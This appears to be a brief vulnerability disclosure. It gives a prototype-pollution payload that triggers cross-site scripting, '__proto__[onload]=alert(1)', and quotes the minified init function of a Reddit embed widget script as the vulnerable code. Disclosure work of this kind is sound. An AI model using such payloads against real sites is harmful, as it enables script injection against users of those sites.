- the payload to trigger the XSS is
__proto__[onload]=alert(1)
vulnerable code(file: http://embed.redditmedia.com/widgets/platform.js):
n.prototype.init = function(a, b, c, d) {
if (this.elem = b,
this.options = c,
!c.url)
return this.error = !0,
this.frame = null,
!1;
this.error = !1,
this.frame = m.build(b, c, a),
this._done = d;
var g = new i
, h = g.callback();
this.frame.one("card.load", function(a, b) {
h({
iframe: a,
doc: b
})
}),
this._extract = g.callback(),
this.extract = e.bind(function(a) {
return this.extracted ? !1 : (this.extracted = !0,
void this._extract(a))
}, this),
c.embed && (this.media = g.callback());
var j = b.parentNode;
j && j.offsetWidth && (j.offsetWidth > 600 ? this.frame.elem.style.width = "600px" : this.frame.elem.style.width = j.offsetWidth + "px");
var k = f.create("div", {
"class": "embedly-card"
})
, l = f.create("div", {
"class": "embedly-card-hug"
});
k.appendChild(l),
l.appendChild(this.frame.elem),
j.insertBefore(k, b),
this.frame.__appended(),
g.wait(this.done, this)
}